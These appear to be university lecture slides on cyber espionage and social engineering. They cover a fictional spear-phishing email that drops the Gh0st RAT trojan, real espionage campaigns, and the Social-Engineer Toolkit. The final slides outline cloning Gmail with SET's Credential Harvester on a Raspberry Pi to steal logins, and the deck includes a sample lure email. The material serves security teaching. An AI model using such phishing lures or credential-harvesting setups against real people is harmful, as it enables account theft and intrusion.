Cyber Espionage and Social Engineering Attacks ChienChung Shen
Cyber Espionage and Social Engineering Attacks Chien-Chung Shen cshen@udel. edu
Can a well-engineered network be broken into? • Consider an agent X who is determined to break into a network with the intention of stealing valuable documents belonging to an organization and for the purpose of conducting general espionage on the activities of the organization • Assume that the targeted organization – is vigilant about keeping up to date with patches and anti-virus software updates – operates behind a well-designed firewall – hires a security company to periodically carry out vulnerability scans and for penetration testing of all its computers – has computers not vulnerable to dictionary attacks • In addition, assume that X is physically based in a different country. Therefore, it is not possible for X to gain a physical entry into the organization’s premises and install a packet sniffer in its LAN
Can a well-engineered network be broken into? • Given the assumptions listed above, it would seem that the organization’s network cannot be broken into • But that turns out not to be the case. Any network, no matter how secure it is from a purely engineering perspective, can be compromised through what is now commonly referred to as “social engineering”
Episode (1) • Assume that an individual named Bob Clueless is a high official in company A in the US and that this company manufactures night-vision goggles for the military. Pretend that there is a country T out there that is barred from importing military hardware, including night-vision goggles, from the US. So this country decides to steal the design documents stored in the computers of the organization A. Since this country does not want to become implicated in cross-border theft, it outsources the job to a local hacker named X. T supplies X with all kinds of information (generated by its embassy in the US) regarding A, its suppliers base, the cost structure of its products, and so on. On the basis of all this information, X sends the following email to Bob Clueless:
Episode (2) To: Bob Clueless From: Joe Smoothseller Subject: Lower cost light amplifier units Dear Bob, We are a low-cost manufacturer of light-amplifier units. Our costs are low because we pay next to nothing to our workers. (Our workers do not seem to mind --- but that’s another story. ) The reason for writing to you is to explore the possibility of us becoming your main supplier for the light amplification unit. The attached document shows the pricing for the different types of light-amplification units we make. Please let me know soon if you would be interested in our light amplifier units. Attachment: light-amplifiers. docx
Episode (3) • When Bob Clueless received the above email, he was already under a great deal of stress because his company had recently lost significant market share in night-vision goggles to a competing firm. Therefore, no sooner did Bob receive the above email than he clicked on the attachment. What Bob did not realize was that his clicking on the attachment caused the execution of a small binary file that was embedded in the attachment. This resulted in Bob’s computer downloading the client gh 0 st that is a part of the gh 0 st. RAT trojan • Subsequently, X had full access to the computer owned by Bob Clueless – As is now told, X used Bob’s computer to infiltrate into the rest of the network belonging to company A — this was the easiest part of the exploit since the other computers trusted Bob’s computer. It is further told that, for cheap laughs, X would occasionally turn on the camera and the microphone in Bob’s laptop and catch Bob picking his nose and making other bodily sounds in the privacy of his office
Steps of Social Engineering Attack • You receive a spoofed e-mail with an attachment • The e-mail appears to come from someone you know • The contents make sense and talk about real things (and in your language) • The attachment is a PDF, DOC, PPT or XLS • When you open up the attachment, you get a document on your screen that makes sense, but you also get exploited at the same time • The exploit drops a hidden remote access trojan, typically a Poison Ivy or a Gh 0 st RAT (Remote Administration Tool) variant – https: //www. f-secure. com/v-descs/backdoor_w 32_poisonivy. shtml – http: //hack 2 learn. blogspot. com/2011/04/rat-tutorial-poison-ivy. html – http: //en. wikipedia. org/wiki/Ghost_Rat • You are the only one in your organization who receives such an email
Trojan • From the standpoint of programming involved, there is no significant difference between bot and trojan • The main difference between a trojan and a bot relates to how they are packaged for delivery to an unsuspecting computer – bot: random hopping – trojan: more targeted • Trojan may be embedded in a piece of code that actually does something useful, but that, at the same time, also does things that are malicious • Sample CERT advisory on trojan – http: //www. cert. org/historical/advisories/CA-1999 -02. cfm
Challenge in Social Engineering Nagaraja and Anderson (University of Cambridge) “This combination of well-written malware with welldesigned email lures, which we call social malware, is devastatingly effective. . . The traditional defense against social malware in government agencies involves expensive and intrusive measures that range from mandatory access controls to tiresome operational security procedures. These will not be sustainable in the economy as a whole. Evolving practical low-cost defenses against social- malware attacks will be a real challenge. ”
The gh 0 st. RAT Trojan • Probably the most potent trojan that is currently in the news. That is not surprising since when a machine is successfully compromised with this trojan, the attackers can gain total control of the machine, even turn on its camera and microphone remotely and capture all the keyboard and mouse events. In addition to being able to run any program on the infected machine, the attackers can thus listen in on the conversations taking place in the vicinity of the infected machine and watch what is going on in front of the computer • The trojan, intended for Windows machines, appears to be the main such trojan that is employed today for cyber espionage • The many faces of Gh 0 st Rat download 01. norman. no/documents/Themanyfacesof. Gh 0 st. Rat. pdf • Know Your Digital Enemy by Mc. Afee http: //www. mcafee. com/us/resources/white-papers/foundstone/wp-know-your-digital-enemy. pdf
Cyber Espionage • Tracking Ghost. Net: Investigating a Cyber Espionage Network http: //www. scribd. com/doc/13731776/Tracking-Ghost. Net-Investigating-a-Cyber-Espionage-Network describes an espionage network that had infected at least 1295 computers in 103 countries, mostly for the purpose of spying on the various Tibetan organizations, especially the offices of the Dalai Lama in Dharamsala, India • Shadows in the Cloud: Investigating Cyber Espionage 2. 0 http: //www. infowar-monitor. net/2010/04/shadows-in-the-cloud-an-investigation-into-cyber-espionage-2 -0 documents an extensive espionage network that successfully stole from various high offices of the Government of In- dia, the Office of the Dalai Lama, the United Nations • The Snooping Dragon: Social-Malware Surveillance of the Tibetan movement http: //www. cl. cam. ac. uk/techreports/UCAM-CL-TR-746. html • Cyberattack on Google Said to Hit Password System http: //www. nytimes. com/2010/04/20/technology/20 google. html? _r=0
Social Engineering Attacks • designed to trick a victim into providing information through misdirection or deceit • Attackers often pretend to be someone they are not, such as someone with authority or a family member, to gain a victim's trust • When they are successful, users might have given up passwords, access credentials, or other valuable secrets • There are many tools that are available in Kali Linux to assist with a social engineering campaign; however, the most successful attacks are based on understanding your target audience and abusing their trust • e. g. , obtain sensitive information using fake accounts on social media sources such as Linked. In and Facebook • e. g. , Emily Williams Social Engineering
Social-Engineer Toolkit (SET) • Was developed by David Kennedy at Trust. Sec and comes preinstalled with Kali Linux • Often used to duplicate trusted websites such as Google, Facebook, and Twitter with the purpose of attracting victims to launch attacks against them • As victims unknowingly browse these duplicate websites, attackers can gather the victims' passwords or possibly inject a command shell that gives them full access to the victims' systems • A great tool for security professionals to demonstrate the chain of trust as a vulnerability (i. e. , demoing how the average person will not pay attention to the location where they enter sensitive information as long as the source looks legit) • https: //www. trustedsec. com/social-engineer-toolkit
Scenario • leverage a Raspberry Pi for on-site reconnaissance that can be used to build a successful social engineering attack that is executed from a remote web server Set up a Pi to clone Gmail • • The goal is to make a victim believe that they are accessing their Gmail account and redirect them to the real Gmail website after they log in but store their login credentials. The trick will be to get the victim to access the SET server; however, that's where your social engineering abilities come into play. For example, you could e-mail a link, post the link on a social media source, or poison the DNS to direct traffic to your attack server The attacker can remotely access the Raspberry Pi to pull down stolen credentials
Launch SET • Type setoolkit and enable bleeding-edge repos (2) (1) (3) select the Credential Harvester Attack Method option to clone Gmail Input local IP and the site to clone
- Slides: 15